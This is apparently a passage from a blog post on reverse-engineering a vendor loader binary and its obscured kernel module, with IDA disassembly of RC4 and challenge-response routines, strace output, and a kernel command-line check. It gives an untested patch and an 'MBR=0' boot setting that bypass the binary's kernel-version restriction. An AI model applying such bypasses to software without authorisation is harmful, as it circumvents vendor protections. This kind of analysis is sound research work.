--------------------------------------------------------------------------- .text:08053D6A .text:08053D6A loc_8053D6A: ; CODE XREF: check_challenge_response+64j .text:08053D6A add al, byte ptr [ebp+ecx+challenge_copy] .text:08053D6E xor al, bl .text:08053D70 .text:08053D70 loc_8053D70: ; CODE XREF: check_challenge_response+7Ej .text:08053D70 mov byte ptr [ebp+ecx+challenge_copy], al .text:08053D74 .text:08053D74 loc_8053D74: ; CODE XREF: check_challenge_response+5Aj .text:08053D74 ; check_challenge_response+66j ... .text:08053D74 inc esi .text:08053D75 cmp esi, 100h .text:08053D7B jnz short loc_8053D18 .text:08053D7D push [ebp+local_rc4_structure] .text:08053D80 call free_rc4_t_tailcall .text:08053D85 mov eax, [ebp+challenge_copy] .text:08053D88 lea esp, [ebp-0Ch] .text:08053D8B pop ebx .text:08053D8C or eax, 80000000h ; ret |= 0x80000000l .text:08053D91 pop esi .text:08053D92 pop edi .text:08053D93 pop ebp .text:08053D94 retn .text:08053D94 check_challenge_response endp .text:08053D94 .text:08053D95 .text:08053D95 ; ??????????????? S U B R O U T I N E ??????????????????????????????????????? .text:08053D95 .text:08053D95 ; Attributes: bp-based frame .text:08053D95 .text:08053D95 sub_8053D95 proc near ; CODE XREF: load_module_into_kernel+2Cp .text:08053D95 push ebp .text:08053D96 dec edx ; 16 -> 15 .text:08053D97 test eax, edx ; eax = 0x3c .text:08053D99 mov ebp, esp .text:08053D9B mov ecx, eax .text:08053D9D jz short loc_8053DA4 .text:08053D9F or edx, eax .text:08053DA1 lea ecx, [edx+1] .text:08053DA4 .text:08053DA4 loc_8053DA4: ; CODE XREF: sub_8053D95+8j .text:08053DA4 pop ebp .text:08053DA5 mov eax, ecx .text:08053DA7 retn .text:08053DA7 sub_8053D95 endp .text:08053DA7 .text:08053DA8 .text:08053DA8 ; ??????????????? S U B R O U T I N E ??????????????????????????????????????? .text:08053DA8 .text:08053DA8 ; Attributes: bp-based frame .text:08053DA8
.text:08053BFD rc4_init_key_encrypt proc near ; CODE XREF: load_module_into_kernel+F9p .text:08053BFD .text:08053BFD var_8 = dword ptr -8 .text:08053BFD rc4_t = dword ptr 8 .text:08053BFD start_of_module_data= dword ptr 0Ch .text:08053BFD .text:08053BFD push ebp .text:08053BFE mov ebp, esp .text:08053C00 push esi .text:08053C01 mov esi, [ebp+rc4_t] .text:08053C04 push ebx .text:08053C05 mov ebx, [ebp+start_of_module_data] .text:08053C08 push esi .text:08053C09 call init_rc4_t .text:08053C0E push dword ptr [ebx] ; push the encryption key .text:08053C10 add ebx, 4 ; move the data along .text:08053C13 push esi ; push the rc4_t context .text:08053C14 call rc4_set_key .text:08053C19 push 1000 ; length .text:08053C1E push esi ; rc4 structure .text:08053C1F call rc4_prevent_weak_bytes .text:08053C24 push 10h ; size .text:08053C26 push ebx ; data .text:08053C27 push esi ; rc4 structure .text:08053C28 call rc4_crypt ; encrypts 16 bytes that go to the kernel module .text:08053C2D lea esp, [ebp-8] .text:08053C30 pop ebx .text:08053C31 pop esi .text:08053C32 pop ebp .text:08053C33 retn .text:08053C33 rc4_init_key_encrypt endp
In general, the feeling is that the loader binary tries to ensure it's running on the same kernel the module was written for, because it is using hard coded offsets to the kernel data. I was disappointed that this module the loader binary inserted didn't appear to be malicious.
To bypass this somewhat artifical restriction the binary imposes is somewhat easily done. The previous code written to hook the create_module and init_module code, can be modified to:
xor eax, eax inc eax ret
to avoid this restriction. I haven't tested this, but it should work :p
Before we can continue the analysis of the fileman binary, we still need to get the loader binary running. Running a strace reveals the current issue with loader:
[box] # LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
execve("./loader", ["./loader"], [/* 15 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
...
[pid 1727] rt_sigaction(SIGSEGV, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGILL, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGABRT, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGBUS, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid 1727] gettimeofday({1189098093, 745332}, NULL) = 0
[pid 1727] create_module("qwink", 1430) = 0xc8833000
[pid 1727] init_module(0x80553fc, 134587376, umovestr: Input/output error
0x7c) = 0
[pid 1726] waitpid(1727, Process 1726 suspended
<unfinished ...>
[pid 1727] delete_module("qwink") = 0
...
[pid 1727] open("/dev/panics", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 1727] open("/proc/cmdline", O_RDONLY) = 3
[pid 1727] fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
[pid 1727] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40170000
[pid 1727] read(3, "root=/dev/hda1 ro single\n", 4096) = 25
[pid 1727] close(3) = 0
[pid 1727] munmap(0x40170000, 4096) = 0
[pid 1727] exit_group(1) = ?
It appears some functionality that is provided elsewhere needs to be initialised first.
Having a look in IDA at loader (cross referencing on /proc/cmdline), indicates that the /proc/cmdline must contain MBR= followed by a pattern that matches %x.
.text:0804DBD4 push offset name ; "/proc/cmdline" .text:0804DBD9 call _fopen ; open the file, read only .text:0804DBDE pop ebx .text:0804DBDF mov esi, eax .text:0804DBE1 test esi, esi .text:0804DBE3 pop eax .text:0804DBE4 jz short loc_804DC34 ; if opening the file failed, jump down to exit(1) .text:0804DBE6 push esi ; FILE * .text:0804DBE7 lea ebx, [ebp+var_408] .text:0804DBED push 1024 ; int .text:0804DBF2 push ebx ; char * .text:0804DBF3 call _fgets ; read in 0x400 bytes .text:0804DBF8 push esi ; FILE * .text:0804DBF9 call _fclose .text:0804DBFE push offset aMbr ; "MBR=" .text:0804DC03 push ebx ; char * .text:0804DC04 call _strstr ; look for MBR= in the string .text:0804DC09 add esp, 18h .text:0804DC0C test eax, eax .text:0804DC0E mov edx, eax .text:0804DC10 jz short loc_804DC34 ; don't find it, exit out .text:0804DC12 mov [ebp+var_40C], 0 ; initialse the number read in .text:0804DC1C lea eax, [ebp+var_40C] ; load the address in .text:0804DC22 push eax .text:0804DC23 push offset aMbrX ; "MBR=%x" .text:0804DC28 push edx ; char * .text:0804DC29 call _sscanf ; parse the string .text:0804DC2E add esp, 0Ch .text:0804DC31 dec eax .text:0804DC32 jz short loc_804DC3B .text:0804DC34 .text:0804DC34 loc_804DC34: ; CODE XREF: sub_804DBC4+20j .text:0804DC34 ; sub_804DBC4+4Cj .text:0804DC34 push 1 ; status .text:0804DC36 call _exit .text:0804DC3B ; ---------------------------------------------
Looking up information on Master boot records (MBR), indicates that the MBR starts at 0x1BE. However, looking where the code is called, there is a comparision to see if it's above a certain size. Restarting with an updated kernel line with MBR=0, lets the binary run, and listen on a network socket.
This article has shown usage QEMU with GDB to debug Linux kernel modules, along with static disassembly provided by IDA Pro. It has covered analysing an obscured kernel module that was bound tightly to a specific, vendor, kernel.
A while ago I accidentally destroyed my previous website content. I've decided to make a new one up, and start afresh, rather than restoring the contents from cached copies.